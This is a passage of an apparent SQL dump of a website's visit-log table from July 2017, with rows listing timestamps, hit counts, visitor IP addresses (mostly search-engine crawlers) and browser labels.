'other'),(131576,1499763874,1,0,1,0,'66.249.66.156',''),(131577,1499763953,1,1,0,0,'207.46.13.71','other'),(131578,1499764371,1,1,0,0,'217.182.132.20','other'),(131579,1499764406,1,1,0,0,'217.69.133.203','other'),(131580,1499764523,1,1,0,0,'95.108.179.15','other'),(131581,1499764695,1,1,0,0,'217.182.132.52','other'),(131582,1499764697,1,1,0,0,'66.102.9.29','chrome'),(131583,1499764717,1,1,0,0,'164.132.164.180','other'),(131584,1499765153,1,1,0,0,'164.132.162.157','other'),(131585,1499765482,1,1,0,0,'51.255.65.13','other'),(131586,1499765494,2,2,0,0,'137.74.203.194','other'),(131587,1499766043,1,1,0,0,'217.182.132.175','other'),(131588,1499766044,1,1,0,0,'51.255.65.69','other'),(131589,1499766062,1,1,0,0,'51.255.65.66','other'),(131590,1499766292,1,1,0,0,'188.166.83.39','chrome'),(131591,1499766413,1,1,0,0,'95.108.179.15','other'),(131592,1499766944,1,0,1,0,'68.180.230.48',''),(131593,1499767267,1,0,1,0,'66.249.66.155',''),(131594,1499767437,1,1,0,0,'51.255.65.62','other'),(131595,1499767529,1,1,0,0,'5.255.253.83','other'),(131596,1499767690,1,1,0,0,'51.255.65.63','other'),(131597,1499767805,1,1,0,0,'217.182.132.76','other'),(131598,1499767837,1,1,0,0,'217.182.132.241','other'),(131599,1499767938,1,1,0,0,'51.255.65.44','other'),(131600,1499768014,1,1,0,0,'89.21.74.207','firefox'),(131601,1499768079,1,1,0,0,'217.69.133.3','other'),(131602,1499768210,1,0,1,0,'68.180.230.48',''),(131603,1499768226,1,1,0,0,'51.255.65.78','other'),(131604,1499768441,1,1,0,0,'95.108.213.34','other'),(131605,1499768488,1,1,0,0,'51.255.65.13','other'),(131606,1499768903,1,1,0,0,'51.255.71.123','other'),(131607,1499768953,1,1,0,0,'51.255.65.75','other'),(131608,1499769189,1,1,0,0,'217.182.132.31','other'),(131609,1499769798,1,1,0,0,'8.29.198.25','other'),(131610,1499770528,1,1,0,0,'51.255.71.121','other'),(131611,1499770672,1,1,0,0,'51.255.71.122','other'),(131612,1499770798,1,1,0,0,'51.255.65.31','other'),(131613,1499770860,1,1,0,0,'51.255.71.112','other'),(131614,1499771087,1,1,0,0,'37.54.95.218','other'),(131615,1499771183,1,1,0,0,'91.196.177.26','chrome'),(131616,1499771288,1,1,0,0,'217.182.132.88','other'),(131617,1499771484,1,1,0,0,'164.132.162.156','other'),(131618,1499771500,1,1,0,0,'51.255.65.42','other'),(131619,1499771834,1,1,0,0,'66.249.76.107','chrome'),(131620,1499772072,1,0,1,0,'68.180.230.48',''),(131621,1499772198,1,1,0,0,'164.132.162.187','other'),(131622,1499772352,1,1,0,0,'164.132.162.153','other'),(131623,1499772571,1,1,0,0,'51.255.71.113','other'),(131624,1499772586,1,1,0,0,'78.26.150.99','firefox'),(131625,1499773446,1,1,0,0,'91.196.178.69','chrome'),(131626,1499773976,1,1,0,0,'95.108.213.34','other'),(131627,1499774041,1,1,0,0,'91.196.178.68','firefox'),(131628,1499774218,1,1,0,0,'51.255.65.88','other'),(131629,1499774638,1,1,0,0,'66.249.76.91','chrome'),(131630,1499774961,2,2,0,0,'216.244.66.246','other'),(131631,1499774962,1,1,0,0,'51.255.65.22','other'),(131632,1499775183,1,1,0,0,'217.182.132.156','other'),(131633,1499775394,1,1,0,0,'151.80.27.118','other'),(131634,1499775438,1,1,0,0,'95.108.179.15','other'),(131635,1499775491,1,1,0,0,'51.255.65.17','other'),(131636,1499775682,1,1,0,0,'164.132.162.157','other'),(131637,1499775846,1,1,0,0,'51.255.65.33','other'),(131638,1499775974,1,1,0,0,'95.108.213.34','other'),(131639,1499776021,1,1,0,0,'217.69.133.5','other'),(131640,1499776041,1,1,0,0,'216.244.66.194','other'),(131641,1499776326,1,1,0,0,'180.76.15.159','other'),(131642,1499776472,1,1,0,0,'164.132.162.158','other'),(131643,1499776600,1,0,1,0,'66.249.66.75',''),(131644,1499776635,1,1,0,0,'141.8.142.164','other'),(131645,1499776646,1,1,0,0,'51.255.65.49','other'),(131646,1499776918,1,1,0,0,'51.255.65.14','other'),(131647,1499777182,1,1,0,0,'137.74.207.164','other'),(131648,1499777321,1,1,0,0,'91.196.177.46','chrome'),(131649,1499777323,1,1,0,0,'217.69.133.5','other'),(131650,1499777385,1,1,0,0,'51.255.71.119','other'),(131651,1499778097,1,1,0,0,'51.255.71.122','other'),(131652,1499778183,1,1,0,0,'51.255.65.55','other'),(131653,1499778605,1,1,0,0,'51.255.65.9','other'),(131654,1499778655,2,2,0,0,'216.244.66.246','other'),(131655,1499779313,1,1,0,0,'51.255.71.110','other'),(131656,1499779661,1,1,0,0,'51.255.65.8','other'),(131657,1499779798,1,1,0,0,'51.255.65.27','other'),(131658,1499779970,1,0,1,0,'66.249.76.108',''),(131659,1499779990,1,1,0,0,'5.255.253.83','other'),(131660,1499780303,2,2,0,0,'91.196.177.46','chrome'),(131661,1499780513,1,1,0,0,'137.74.203.194','other'),(131662,1499780629,1,1,0,0,'8.29.198.25','other'),(131663,1499781030,1,1,0,0,'51.255.71.126','other'),(131664,1499781167,1,1,0,0,'217.182.132.151','other'),(131665,1499781341,1,1,0,0,'157.55.39.35','other'),(131666,1499781631,1,1,0,0,'91.196.176.13','chrome'),(131667,1499781779,1,1,0,0,'217.69.133.5','other'),(131668,1499781780,1,1,0,0,'51.255.65.65','other'),(131669,1499781976,1,1,0,0,'217.182.132.68','other'),(131670,1499782062,4,4,0,0,'216.244.66.246','other'),(131671,1499782353,1,1,0,0,'82.207.49.122','chrome'),(131672,1499782475,1,1,0,0,'95.108.213.8','other'),(131673,1499782478,1,1,0,0,'95.108.179.8','other'),(131674,1499782507,1,1,0,0,'51.255.65.45','other'),(131675,1499782806,1,0,1,0,'68.180.230.48',''),(131676,1499782843,1,1,0,0,'91.196.177.15','chrome'),(131677,1499783319,1,1,0,0,'81.7.9.18','chrome'),(131678,1499783526,1,1,0,0,'141.8.142.164','other'),(131679,1499783656,1,0,1,0,'66.249.66.74',''),(131680,1499783707,1,1,0,0,'217.182.132.146','other'),(131681,1499783793,3,3,0,0,'216.244.66.194','other'),(131682,1499784069,1,1,0,0,'51.255.71.117','other'),(131683,1499784389,1,1,0,0,'217.182.132.182','other'),(131684,1499784928,1,1,0,0,'216.244.66.237','other'),(131685,1499785375,1,1,0,0,'51.255.71.98','other'),(131686,1499785576,1,1,0,0,'217.182.132.24','other'),(131687,1499786000,1,1,0,0,'216.244.66.246','other'),(131688,1499786832,1,1,0,0,'137.74.207.116','other'),(131689,1499786893,1,0,1,0,'66.249.76.109',''),(131690,1499787587,1,1,0,0,'82.145.220.195','other'),(131691,1499787592,1,1,0,0,'82.145.220.195','opera'),(131692,1499787920,1,1,0,0,'51.255.65.44','other'),(131693,1499788060,1,1,0,0,'217.182.132.84','other'),(131694,1499788141,1,1,0,0,'51.255.65.21','other'),(131695,1499788853,1,1,0,0,'217.69.133.3','other'),(131696,1499788890,1,1,0,0,'51.255.71.131','other'),(131697,1499789150,2,2,0,0,'216.244.66.194','other'),(131698,1499789264,1,0,1,0,'66.249.76.91',''),(131699,1499789346,1,1,0,0,'217.182.132.153','other'),(131700,1499789552,1,1,0,0,'217.182.132.56','other'),(131701,1499789997,1,1,0,0,'51.255.65.8','other'),(131702,1499790161,1,1,0,0,'157.55.39.178','other'),(131703,1499790766,1,1,0,0,'51.255.65.44','other'),(131704,1499791126,1,1,0,0,'217.182.132.73','other'),(131705,1499791365,1,1,0,0,'217.69.133.5','other'),(131706,1499791462,1,1,0,0,'8.29.198.27','other'),(131707,1499791732,1,1,0,0,'51.255.65.96','other'),(131708,1499791929,1,1,0,0,'217.182.132.55','other'),(131709,1499792182,1,1,0,0,'217.182.132.148','other'),(131710,1499792429,1,1,0,0,'91.196.178.68','firefox'),(131711,1499792587,1,1,0,0,'217.182.132.67','other'),(131712,1499792671,1,1,0,0,'217.182.132.73','other'),(131713,1499792954,1,1,0,0,'51.255.65.32','other'),(131714,1499792988,1,1,0,0,'217.182.132.156','other'),(131715,1499793881,3,3,0,0,'216.244.66.246','other'),(131716,1499794051,1,1,0,0,'51.255.65.10','other'),(131717,1499794207,1,1,0,0,'51.255.71.121','other'),(131718,1499794240,1,1,0,0,'164.132.162.160','other'),(131719,1499794319,1,1,0,0,'141.8.142.154','other'),(131720,1499794589,1,1,0,0,'5.255.253.63','other'),(131721,1499794612,2,2,0,0,'216.244.66.194','other'),(131722,1499795065,1,1,0,0,'51.255.65.20','other'),(131723,1499795279,1,1,0,0,'87.250.224.7','other'),(131724,1499796022,1,1,0,0,'91.196.178.163','chrome'),(131725,1499796029,1,1,0,0,'137.74.207.116','other'),(131726,1499796115,1,1,0,0,'51.255.65.68','other'),(131727,1499796590,2,2,0,0,'217.182.132.7','other'),(131728,1499796663,1,1,0,0,'176.37.125.85','chrome'),(131729,1499796686,1,1,0,0,'137.74.207.161','other'),(131730,1499796775,1,1,0,0,'217.182.132.177','other'),(131731,1499797073,1,1,0,0,'217.69.133.6','other'),(131732,1499797337,1,1,0,0,'217.182.132.21','other'),(131733,1499797536,1,1,0,0,'157.55.39.35','other'),(131734,1499798756,1,1,0,0,'178.92.85.231','chrome'),(131735,1499798785,1,1,0,0,'216.244.66.246','other'),(131736,1499798850,1,1,0,0,'164.132.162.153','other'),(131737,1499798942,1,0,1,0,'66.249.66.75',''),(131738,1499798988,1,1,0,0,'137.74.207.109','other'),(131739,1499799005,1,1,0,0,'217.69.133.5','other'),(131740,1499799338,1,1,0,0,'217.182.132.19','other'),(131741,1499799460,3,3,0,0,'216.244.66.194','other'),(131742,1499799471,1,1,0,0,'91.204.84.90','chrome'),(131743,1499799526,1,1,0,0,'87.250.224.18','other'),(131744,1499800344,1,1,0,0,'217.69.133.194','other'),(131745,1499801137,1,1,0,0,'51.255.65.33','other'),(131746,1499801297,1,1,0,0,'217.182.132.187','other'),(131747,1499801344,1,1,0,0,'141.8.142.154','other'),(131748,1499801494,1,1,0,0,'217.182.132.28','other'),(131749,1499801895,1,1,0,0,'87.250.224.18','other'),(131750,1499802124,1,1,0,0,'217.182.132.20','other'),(131751,1499802293,1,1,0,0,'8.29.198.25','other'),(131752,1499802408,1,1,0,0,'66.249.66.157','chrome'),(131753,1499802509,1,1,0,0,'51.255.65.55','other'),(131754,1499802704,1,1,0,0,'66.249.66.76','chrome'),(131755,1499802870,1,1,0,0,'217.69.133.3','other'),(131756,1499803421,1,1,0,0,'93.158.152.77','other'),(131757,1499803458,1,1,0,0,'137.74.207.109','other'),(131758,1499803692,1,1,0,0,'217.182.132.91','other'),(131759,1499803824,1,1,0,0,'217.182.132.7','other'),(131760,1499804080,1,1,0,0,'137.74.207.114','other'),(131761,1499804847,1,1,0,0,'217.69.133.194','other'),(131762,1499804987,1,1,0,0,'51.255.65.20','other'),(131763,1499805313,1,1,0,0,'139.59.152.186','other'),(131764,1499805598,1,1,0,0,'88.198.19.164','other'),(131765,1499805852,1,1,0,0,'217.182.132.19','other'),(131766,1499806010,1,1,0,0,'51.255.65.48','other'),(131767,1499806948,1,1,0,0,'217.182.132.170','other'),(131768,1499807207,1,1,0,0,'95.108.213.7','other'),(131769,1499807347,1,1,0,0,'51.255.65.23','other'),(131770,1499808102,1,1,0,0,'51.255.71.125','other'),(131771,1499809011,1,1,0,0,'216.244.66.246','other'),(131772,1499809028,1,1,0,0,'137.74.207.102','other'),(131773,1499809457,1,1,0,0,'66.249.76.91','chrome'),(131774,1499810172,1,1,0,0,'51.255.65.52','other'),(131775,1499810275,1,0,1,0,'66.249.76.109',''),(131776,1499810509,1,0,1,0,'66.249.66.156',''),(131777,1499811210,1,1,0,0,'141.8.142.38','other'),(131778,1499811226,1,1,0,0,'51.255.65.71','other'),(131779,1499812989,1,1,0,0,'51.255.65.63','other'),(131780,1499813125,1,1,0,0,'8.29.198.27','other'),(131781,1499813231,2,2,0,0,'216.244.66.246','other'),(131782,1499813287,1,1,0,0,'217.182.132.69','other'),(131783,1499813422,1,1,0,0,'178.154.200.2','other'),(131784,1499813459,1,0,1,0,'66.249.76.107',''),(131785,1499813491,1,1,0,0,'87.250.224.18','other'),(131786,1499813560,1,1,0,0,'217.182.132.20','other'),(131787,1499813630,1,1,0,0,'51.255.65.87','other'),(131788,1499813805,1,1,0,0,'217.182.132.77','other'),(131789,1499813819,1,1,0,0,'51.255.65.66','other'),(131790,1499814046,1,1,0,0,'217.182.132.193','other'),(131791,1499814124,1,1,0,0,'51.255.71.111','other'),(131792,1499814415,1,1,0,0,'66.249.76.107','chrome'),(131793,1499814575,1,1,0,0,'51.255.71.130','other'),(131794,1499814576,1,1,0,0,'178.154.189.3','other'),(131795,1499814897,1,0,1,0,'68.180.230.48',''),(131796,1499815156,1,1,0,0,'95.220.33.230','msie'),(131797,1499815173,1,1,0,0,'164.132.162.153','other'),(131798,1499815269,1,1,0,0,'217.182.132.60','other'),(131799,1499815609,1,1,0,0,'54.165.59.7','other'),(131800,1499815657,1,1,0,0,'5.255.253.58','other'),(131801,1499815935,1,1,0,0,'217.182.132.5','other'),(131802,1499817703,1,1,0,0,'51.255.65.13','other'),(131803,1499818366,1,1,0,0,'217.182.132.31','other'),(131804,1499818905,1,1,0,0,'217.182.132.180','other'),(131805,1499819053,1,1,0,0,'51.255.71.111','other'),(131806,1499819134,1,1,0,0,'51.255.71.131','other'),(131807,1499819404,1,1,0,0,'51.255.65.95','other'),(131808,1499819415,1,1,0,0,'51.255.65.92','other'),(131809,1499819991,1,1,0,0,'51.255.65.56','other'),(131810,1499820263,2,2,0,0,'216.244.66.246','other'),(131811,1499820639,1,0,1,0,'68.180.230.48',''),(131812,1499820645,1,1,0,0,'66.249.76.91','chrome'),(131813,1499821193,1,1,0,0,'164.132.162.156','other'),(131814,1499821383,1,1,0,0,'137.74.207.188','other'),(131815,1499821512,1,0,1,0,'66.249.66.156',''),(131816,1499822293,1,1,0,0,'216.244.66.237','other'),(131817,1499822322,2,1,1,0,'66.249.76.109',''),(131818,1499822353,1,1,0,0,'217.69.133.194','other'),(131819,1499822430,1,1,0,0,'217.182.132.181','other'),(131820,1499822927,1,1,0,0,'151.80.27.118','other'),(131821,1499822962,1,1,0,0,'217.182.132.6','other'),(131822,1499823189,1,1,0,0,'137.74.207.108','other'),(131823,1499823234,1,0,1,0,'66.249.76.89',''),(131824,1499823265,1,0,1,0,'66.249.66.75',''),(131825,1499823461,1,1,0,0,'217.182.132.61','other'),(131826,1499823956,1,1,0,0,'8.29.198.25','other'),(131827,1499824475,1,1,0,0,'51.255.65.33','other'),(131828,1499824918,1,1,0,0,'216.244.66.194','other'),(131829,1499824984,1,1,0,0,'95.108.213.7','other'),(131830,1499824988,1,1,0,0,'141.8.132.25','other'),(131831,1499824992,1,1,0,0,'217.182.132.193','other'),(131832,1499825125,1,1,0,0,'217.182.132.64','other'),(131833,1499826308,1,1,0,0,'217.69.133.2','other'),(131834,1499826541,1,1,0,0,'95.108.213.7','other'),(131835,1499826619,1,0,1,0,'66.249.76.107',''),(131836,1499826634,1,1,0,0,'51.255.65.48','other'),(131837,1499826843,1,1,0,0,'217.182.132.94','other'),(131838,1499827568,2,2,0,0,'216.244.66.246','other'),(131839,1499827948,3,3,0,0,'216.244.66.194','other'),(131840,1499828211,1,0,1,0,'66.249.76.91',''),(131841,1499828219,1,1,0,0,'51.255.65.72','other'),(131842,1499828248,1,1,0,0,'217.182.132.20','other'),(131843,1499828497,1,1,0,0,'180.76.15.136','other'),(131844,1499828667,1,0,1,0,'66.249.76.89',''),(131845,1499829365,1,1,0,0,'216.244.66.246','other'),(131846,1499829394,1,1,0,0,'217.69.133.194','other'),(131847,1499829761,1,1,0,0,'141.8.132.72','other'),(131848,1499829777,1,0,1,0,'66.249.76.109',''),(131849,1499830260,1,1,0,0,'51.255.65.87','other'),(131850,1499830305,1,1,0,0,'141.8.142.28','other'),(131851,1499830502,1,1,0,0,'141.8.132.39','other'),(131852,1499830560,1,1,0,0,'217.182.132.18','other'),(131853,1499830614,1,1,0,0,'217.182.132.52','other'),(131854,1499830661,1,0,1,0,'66.249.76.91',''),(131855,1499831311,1,1,0,0,'51.255.65.32','other'),(131856,1499831666,2,2,0,0,'91.209.11.236','other'),(131857,1499831719,1,1,0,0,'51.255.65.57','other'),(131858,1499831988,1,1,0,0,'51.255.65.71','other'),(131859,1499832031,1,1,0,0,'164.132.162.156','other'),(131860,1499832117,1,1,0,0,'217.69.133.9','other'),(131861,1499832145,1,1,0,0,'216.244.66.194','other'),(131862,1499832464,1,1,0,0,'95.108.213.32','other'),(131863,1499832888,1,1,0,0,'141.8.142.154','other'),(131864,1499833332,1,1,0,0,'217.182.132.59','other'),(131865,1499833404,1,1,0,0,'163.172.30.231','chrome'),(131866,1499833835,1,1,0,0,'217.69.133.194','other'),(131867,1499834227,1,1,0,0,'217.182.132.63','other'),(131868,1499834409,1,1,0,0,'141.8.142.154','other'),(131869,1499834522,1,1,0,0,'91.196.178.67','firefox'),(131870,1499834579,1,1,0,0,'51.255.65.2','other'),(131871,1499834592,2,2,0,0,'91.209.11.236','other'),(131872,1499834668,1,1,0,0,'51.255.65.11','other'),(131873,1499834786,1,0,1,0,'68.180.230.48',''),(131874,1499834788,1,1,0,0,'8.29.198.25','other'),(131875,1499834986,1,1,0,0,'51.255.71.110','other'),(131876,1499835148,1,1,0,0,'217.182.132.87','other'),(131877,1499835166,1,0,1,0,'66.249.66.76',''),(131878,1499835180,1,1,0,0,'217.69.133.3','other'),(131879,1499835182,1,1,0,0,'217.69.133.9','other'),(131880,1499835242,2,2,0,0,'216.244.66.246','other'),(131881,1499835311,3,3,0,0,'216.244.66.194','other'),(131882,1499835852,1,1,0,0,'217.182.132.190','other'),(131883,1499836080,1,1,0,0,'91.209.11.236','other'),(131884,1499836194,1,0,1,0,'66.249.66.76',''),(131885,1499836653,1,1,0,0,'51.255.65.49','other'),(131886,1499836823,1,1,0,0,'176.31.231.10','other'),(131887,1499836914,1,1,0,0,'217.182.132.181','other'),(131888,1499837102,1,1,0,0,'207.46.13.74','other'),(131889,1499837130,1,1,0,0,'91.209.11.236','other'),(131890,1499837472,1,1,0,0,'51.255.65.16','other'),(131891,1499837487,1,1,0,0,'217.182.132.18','other'),(131892,1499837891,1,1,0,0,'217.69.133.2','other'),(131893,1499837922,1,1,0,0,'51.255.65.14','other'),(131894,1499837980,1,1,0,0,'95.108.213.34','other'),(131895,1499839130,1,1,0,0,'217.182.132.146','other'),(131896,1499839216,1,0,1,0,'66.249.76.109',''),(131897,1499839285,1,1,0,0,'217.182.132.147','other'),(131898,1499839366,1,1,0,0,'51.255.71.117','other'),(131899,1499840753,1,0,1,0,'68.180.230.48',''),(131900,1499840987,1,1,0,0,'66.102.9.29','chrome'),(131901,1499841066,1,1,0,0,'91.196.177.46','chrome'),(131902,1499841186,1,1,0,0,'91.230.198.34','chrome'),(131903,1499841268,1,1,0,0,'141.8.132.43','other'),(131904,1499841374,1,1,0,0,'141.8.142.38','other'),(131905,1499841568,1,1,0,0,'66.249.66.76','chrome'),(131906,1499841692,1,0,1,0,'66.249.66.157',''),(131907,1499841698,1,0,1,0,'66.249.66.155',''),(131908,1499841746,1,1,0,0,'91.196.178.69','chrome'),(131909,1499841771,1,1,0,0,'91.196.178.37','chrome'),(131910,1499841789,1,1,0,0,'95.108.213.7','other'),(131911,1499841810,1,1,0,0,'141.8.142.48','other'),(131912,1499841813,1,1,0,0,'87.250.224.18','other'),(131913,1499841960,1,1,0,0,'93.158.152.79','other'),(131914,1499842211,1,1,0,0,'217.182.132.17','other'),(131915,1499842287,1,1,0,0,'217.182.132.28','other'),(131916,1499842535,1,1,0,0,'217.182.132.53','other'),(131917,1499842614,3,3,0,0,'216.244.66.194','other'),(131918,1499843594,1,1,0,0,'37.53.230.108','firefox'),(131919,1499843871,1,1,0,0,'217.182.132.67','other'),(131920,1499843969,1,1,0,0,'91.196.179.33','firefox'),(131921,1499844026,1,1,0,0,'66.249.76.91','chrome'),(131922,1499844195,1,1,0,0,'217.182.132.78','other'),(131923,1499844390,1,1,0,0,'178.154.200.2','other'),(131924,1499844568,1,1,0,0,'91.196.178.66','firefox'),(131925,1499845290,1,1,0,0,'51.255.65.49','other'),(131926,1499845546,1,1,0,0,'51.255.65.9','other'),(131927,1499845604,1,1,0,0,'95.132.88.127','chrome'),(131928,1499845619,1,1,0,0,'8.29.198.25','other'),(131929,1499845881,2,2,0,0,'217.80.203.6','other'),(131930,1499845972,2,2,0,0,'95.132.45.165','chrome'),(131931,1499846461,1,1,0,0,'91.196.178.69','chrome'),(131932,1499846635,1,1,0,0,'87.250.224.7','other'),(131933,1499846639,1,1,0,0,'178.154.200.2','other'),(131934,1499846653,2,2,0,0,'216.244.66.246','other'),(131935,1499846810,1,1,0,0,'87.250.224.8','other'),(131936,1499846854,1,1,0,0,'51.255.65.97','other'),(131937,1499847172,1,1,0,0,'51.255.65.73','other'),(131938,1499847184,1,1,0,0,'51.255.65.52','other'),(131939,1499847405,1,1,0,0,'217.182.132.153','other'),(131940,1499847724,1,1,0,0,'66.249.76.93','chrome'),(131941,1499847773,1,1,0,0,'66.249.76.89','chrome'),(131942,1499848330,1,1,0,0,'93.74.212.147','firefox'),(131943,1499848397,1,1,0,0,'46.200.116.209','firefox'),(131944,1499848484,1,1,0,0,'66.249.76.91','chrome'),(131945,1499848515,1,1,0,0,'91.196.178.71','chrome'),(131946,1499849453,1,1,0,0,'207.46.13.71','other'),(131947,1499849548,1,1,0,0,'66.249.76.108','chrome'),(131948,1499849926,1,1,0,0,'37.55.203.69','chrome'),(131949,1499849995,1,0,1,0,'66.249.76.109',''),(131950,1499850077,1,1,0,0,'37.73.235.121','chrome'),(131951,1499850187,1,1,0,0,'185.102.219.109','chrome'),(131952,1499850242,1,0,1,0,'66.249.66.157',''),(131953,1499850360,1,1,0,0,'216.244.66.237','other'),(131954,1499850895,1,1,0,0,'51.255.71.100','other'),(131955,1499851242,1,0,1,0,'68.180.230.48',''),(131956,1499851411,1,1,0,0,'216.244.66.194','other'),(131957,1499851981,1,1,0,0,'95.132.88.127','chrome'),(131958,1499852058,1,1,0,0,'157.55.39.178','other'),(131959,1499852209,1,1,0,0,'178.255.215.94','other'),(131960,1499852397,1,0,1,0,'66.249.76.109',''),(131961,1499852599,1,1,0,0,'216.244.66.246','other'),(131962,1499853036,1,1,0,0,'188.166.81.170','chrome'),(131963,1499853040,1,1,0,0,'217.182.132.62','other'),(131964,1499853046,1,1,0,0,'95.108.179.8','other'),(131965,1499853535,1,1,0,0,'217.182.132.191','other'),(131966,1499853618,1,0,1,0,'66.249.76.93',''),(131967,1499854010,3,3,0,0,'216.244.66.194','other'),(131968,1499854064,1,1,0,0,'141.8.142.164','other'),(131969,1499854145,1,1,0,0,'51.255.71.122','other'),(131970,1499854295,1,1,0,0,'217.182.132.62','other'),(131971,1499854994,1,1,0,0,'141.8.142.154','other'),(131972,1499855045,1,1,0,0,'217.182.132.92','other'),(131973,1499855125,1,1,0,0,'217.69.133.3','other'),(131974,1499855700,1,0,1,0,'66.249.66.157',''),(131975,1499855773,1,1,0,0,'164.132.162.159','other'),(131976,1499855831,1,1,0,0,'217.182.132.82','other'),(131977,1499856425,1,0,1,0,'66.249.66.156',''),(131978,1499856442,1,1,0,0,'8.29.198.25','other'),(131979,1499856450,1,1,0,0,'217.182.132.50','other'),(131980,1499856765,1,1,0,0,'207.46.13.100','other'),(131981,1499856905,1,1,0,0,'130.185.10.202','chrome'),(131982,1499856982,1,1,0,0,'217.182.132.175','other'),(131983,1499857040,1,1,0,0,'51.255.65.50','other'),(131984,1499857284,1,1,0,0,'37.145.10.63','chrome'),(131985,1499857285,1,1,0,0,'31.135.83.9','chrome'),(131986,1499857491,1,1,0,0,'51.255.65.35','other'),(131987,1499857749,1,1,0,0,'216.244.66.237','other'),(131988,1499857768,1,1,0,0,'180.76.15.160','other'),(131989,1499858375,1,1,0,0,'217.182.132.174','other'),(131990,1499858431,1,1,0,0,'77.120.18.52','chrome'),(131991,1499858690,1,1,0,0,'216.244.66.194','other'),(131992,1499858700,1,1,0,0,'51.255.65.58','other'),(131993,1499858858,1,1,0,0,'51.255.65.49','other'),(131994,1499858965,1,1,0,0,'216.244.66.246','other'),(131995,1499859054,1,1,0,0,'51.255.65.25','other'),(131997,1499859057,1,1,0,0,'91.196.178.69','chrome'),(131998,1499859303,1,1,0,0,'95.132.88.127','chrome'),(131999,1499859481,1,1,0,0,'217.182.132.149','other'),(132000,1499860016,1,1,0,0,'157.55.39.178','other'),(132001,1499860070,1,1,0,0,'46.201.69.99','chrome'),(132002,1499860109,1,1,0,0,'217.182.132.156','other'),(132003,1499860182,1,1,0,0,'217.182.132.170','other'),(132004,1499861485,1,1,0,0,'107.178.194.29','msie'),(132005,1499861488,1,1,0,0,'204.13.201.137','msie'),(132006,1499861719,1,1,0,0,'91.209.11.236','other'),(132007,1499861761,2,2,0,0,'51.15.52.84','chrome'),(132008,1499861818,1,1,0,0,'178.62.99.175','msie'),(132009,1499861836,1,1,0,0,'51.15.52.84','msie'),(132010,1499861931,1,1,0,0,'51.15.52.84','firefox'),(132011,1499861933,1,1,0,0,'207.46.13.71','other'),(132012,1499861970,1,1,0,0,'51.15.52.84','other'),(132013,1499862274,4,4,0,0,'216.244.66.246','other'),(132014,1499862551,1,1,0,0,'150.70.173.50','msie'),(132015,1499862598,1,0,1,0,'68.180.230.48',''),(132016,1499862618,1,1,0,0,'51.255.65.29','other'),(132017,1499862740,1,1,0,0,'188.166.72.117','chrome'),(132018,1499862933,1,1,0,0,'46.201.125.35','chrome'),(132019,1499863178,1,1,0,0,'95.24.51.52','msie'),(132020,1499863368,1,1,0,0,'46.200.116.209','firefox'),(132021,1499863901,1,1,0,0,'51.255.65.39','other'),(132022,1499863944,1,1,0,0,'207.46.13.74','other'),(132023,1499864454,1,1,0,0,'95.108.179.15','other'),(132024,1499864944,1,1,0,0,'37.55.151.241','firefox'),(132025,1499864979,1,1,0,0,'195.154.251.162','chrome'),(132026,1499865260,1,1,0,0,'51.255.65.39','other'),(132027,1499865540,1,1,0,0,'217.182.132.192','other'),(132028,1499865872,1,1,0,0,'217.182.132.186','other'),(132029,1499866957,1,1,0,0,'217.182.132.241','other'),(132030,1499866965,1,1,0,0,'217.182.132.80','other'),(132031,1499867277,1,1,0,0,'8.29.198.26','other'),(132032,1499867886,1,1,0,0,'51.255.71.129','other'),(132033,1499868338,1,1,0,0,'137.74.207.120','other'),(132034,1499868542,1,1,0,0,'141.8.142.42','other'),(132035,1499868545,1,1,0,0,'141.8.142.164','other'),(132036,1499868796,1,1,0,0,'40.77.167.122','other'),(132037,1499868876,1,1,0,0,'217.182.132.153','other'),(132038,1499868949,1,1,0,0,'188.166.79.186','chrome'),(132039,1499869088,2,2,0,0,'216.244.66.246','other'),(132040,1499869187,1,1,0,0,'141.8.183.1','other'),(132041,1499869443,1,1,0,0,'5.255.253.63','other'),(132042,1499869517,1,1,0,0,'87.250.224.7','other'),(132043,1499869575,1,1,0,0,'91.196.178.66','firefox'),(132044,1499869816,1,1,0,0,'51.255.65.86','other'),(132045,1499870169,3,3,0,0,'118.89.106.237','other'),(132046,1499871146,1,1,0,0,'217.182.132.62','other'),(132047,1499871152,1,1,0,0,'87.250.224.18','other'),(132048,1499871611,1,1,0,0,'51.255.65.3','other'),(132049,1499871691,1,1,0,0,'217.182.132.7','other'),(132050,1499871905,1,1,0,0,'180.76.15.8','other'),(132051,1499872089,1,0,1,0,'66.249.76.109',''),(132052,1499872414,2,2,0,0,'216.244.66.194','other'),(132053,1499872519,3,3,0,0,'216.244.66.246','other'),(132054,1499872683,1,1,0,0,'180.76.15.16','other'),(132055,1499872982,1,1,0,0,'51.255.71.127','other'),(132056,1499873023,1,1,0,0,'95.108.213.34','other'),(132057,1499873503,1,1,0,0,'216.244.66.237','other'),(132058,1499873881,1,1,0,0,'217.69.133.3','other'),(132059,1499874089,1,1,0,0,'91.196.178.162','chrome'),(132060,1499874227,1,1,0,0,'95.108.213.7','other'),(132061,1499874385,1,1,0,0,'66.249.76.107','chrome'),(132062,1499874836,1,1,0,0,'95.108.213.8','other'),(132063,1499875154,1,1,0,0,'51.255.71.110','other'),(132064,1499876184,1,1,0,0,'51.255.65.224','other'),(132065,1499876227,1,1,0,0,'163.172.30.231','chrome'),(132066,1499876384,1,1,0,0,'66.249.66.74','chrome'),(132067,1499876532,1,1,0,0,'66.249.76.93','chrome'),(132068,1499876533,1,1,0,0,'180.76.15.141','other'),(132069,1499876691,1,1,0,0,'95.108.213.7','other'),(132070,1499876915,1,1,0,0,'91.196.178.104','firefox'),(132071,1499877623,1,1,0,0,'51.255.65.52','other'),(132072,1499877970,1,1,0,0,'137.74.207.102','other'),(132073,1499878117,1,1,0,0,'8.29.198.26','other'),(132074,1499878207,1,1,0,0,'5.255.253.63','other'),(132075,1499878699,1,1,0,0,'178.154.200.45','other'),(132076,1499879100,1,1,0,0,'95.108.181.13','other'),(132077,1499879925,1,1,0,0,'91.196.178.168','chrome'),(132078,1499879969,2,2,0,0,'216.244.66.246','other'),(132079,1499880056,1,1,0,0,'95.65.219.191','other'),(132080,1499880303,1,1,0,0,'51.255.65.70','other'),(132081,1499880918,1,1,0,0,'66.249.66.76','chrome'),(132082,1499881309,1,1,0,0,'217.182.132.54','other'),(132083,1499881348,1,1,0,0,'51.255.65.55','other'),(132084,1499881726,1,1,0,0,'94.178.115.43','firefox'),(132085,1499881996,1,1,0,0,'207.46.13.100','other'),(132086,1499882137,1,1,0,0,'217.182.132.6','other'),(132087,1499882634,1,1,0,0,'94.179.208.73','chrome'),(132088,1499883182,1,1,0,0,'51.255.65.10','other'),(132089,1499883486,1,1,0,0,'46.48.13.161'